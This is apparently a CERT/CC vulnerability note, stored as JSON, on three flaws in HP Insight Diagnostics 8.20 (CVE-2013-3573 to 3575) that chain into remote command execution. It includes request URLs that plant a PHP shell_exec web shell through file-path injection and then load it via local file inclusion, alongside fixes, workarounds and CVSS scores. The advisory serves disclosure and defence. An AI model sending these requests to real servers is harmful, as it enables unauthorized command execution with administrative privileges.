{"vuid":"VU#324668","idnumber":"324668","name":"HP Insight Diagnostics 8.20 b2878 multiple vulnerabilities","keywords":["hp","insight","diagnostics","cwe-73","cwe-74","cwe-98"],"overview":"HP Insight Diagnostics 8.20 b2878 and possibly earlier versions contains multiple vulnerabilities.","clean_desc":"It has been reported that HP Insight Diagnostics 8.20 b2878 and possibly earlier versions contains multiple vulnerabilities that can be exploited by a remote attacker to execute arbitrary PHP code thus arbitrary commands with administrative privileges. CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') - CVE-2013-3573 CWE-73: External Control of File Name or Path - CVE-2013-3574\nHP Insight Diagnostics contains two vulnerabilities that together allow an attacker to inject arbitrary data into a file that is stored at an arbitrary location on the server via the \"devicePath\" parameter (formerly \"mount\" in older versions). https://:2381/hpdiags/frontend2/commands/saveCompareConfig.php?filename=comparesurvey&target=winhardrive&device=&devicePath=C:/hp/hpsmh/data/htdocs/hpdiags/frontend2/help/&category=all&advanced=yes&leftFile=surveybase.xml&leftFileName=<%3f=shell_exec($_REQUEST[0])%3b%3f>&rightFile=survey.lastwebsession.xml&rightFileName=-&changesOnly=yes&overwrite=yes CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program - CVE-2013-3575\nHP Insight Diagnostics contains a local file inclusion vulnerability that is limited to \".html\" inside the \"/hpdiags/frontend2/help/\" directory. https://:2381/hpdiags/frontend2/help/pageview.php?path=comparesurvey.html","impact":"By combining these vulnerabilities, an authenticated remote attacker may be able to execute arbitrary commands on the server with administrator privileges.","resolution":"We are currently unaware of a practical solution to this problem. CVE-2013-3573 - Fixed in HP Insight Diagnostics 8.20 b2878\nCVE-2013-3574 - Fixed in HP Insight Diagnostics 9.52\nCVE-2013-3575 - Fixed in HP Insight Diagnostics 9.52","workarounds":"Restrict Network Access As a general good security practice, only allow connections from trusted hosts and networks. Restricting access would prevent an attacker from connecting to the service from a blocked network location.","sysaffected":"","thanks":"Thanks to Markus Wulftange from Daimler TSS for reporting this vulnerability.","author":"This document was written by Michael Orlando.","public":["http://cwe.mitre.org/data/definitions/73.html","http://cwe.mitre.org/data/definitions/74.html","http://cwe.mitre.org/data/definitions/98.html","http://www.hp.com/servers/diags","http://bizsupport2.austin.hp.com/bc/docs/support/SupportManual/c03652816/c03652816.pdf"],"cveids":["CVE-2013-3573","CVE-2013-3574","CVE-2013-3575"],"certadvisory":"","uscerttechnicalalert":null,"datecreated":"2013-04-02T17:09:50Z","publicdate":"2013-06-10T00:00:00Z","datefirstpublished":"2013-06-10T12:55:06Z","dateupdated":"2014-07-30T06:35:47Z","revision":17,"vrda_d1_directreport":"1","vrda_d1_population":"3","vrda_d1_impact":"3","cam_widelyknown":"0","cam_exploitation":"0","cam_internetinfrastructure":"0","cam_population":"0","cam_impact":"0","cam_easeofexploitation":"0","cam_attackeraccessrequired":"0","cam_scorecurrent":"0","cam_scorecurrentwidelyknown":"0","cam_scorecurrentwidelyknownexploited":"0","ipprotocol":"","cvss_accessvector":"N","cvss_accesscomplexity":"L","cvss_authentication":null,"cvss_confidentialityimpact":"P","cvss_integrityimpact":"P","cvss_availabilityimpact":"P","cvss_exploitablity":null,"cvss_remediationlevel":"U","cvss_reportconfidence":"UC","cvss_collateraldamagepotential":"ND","cvss_targetdistribution":"L","cvss_securityrequirementscr":"ND","cvss_securityrequirementsir":"ND","cvss_securityrequirementsar":"ND","cvss_basescore":"6.5","cvss_basevector":"AV:N/AC:L/Au:S/C:P/I:P/A:P","cvss_temporalscore":"5","cvss_environmentalscore":"1.24748266428844","cvss_environmentalvector":"CDP:ND/TD:L/CR:ND/IR:ND/AR:ND","metric":0.0,"vulnote":null}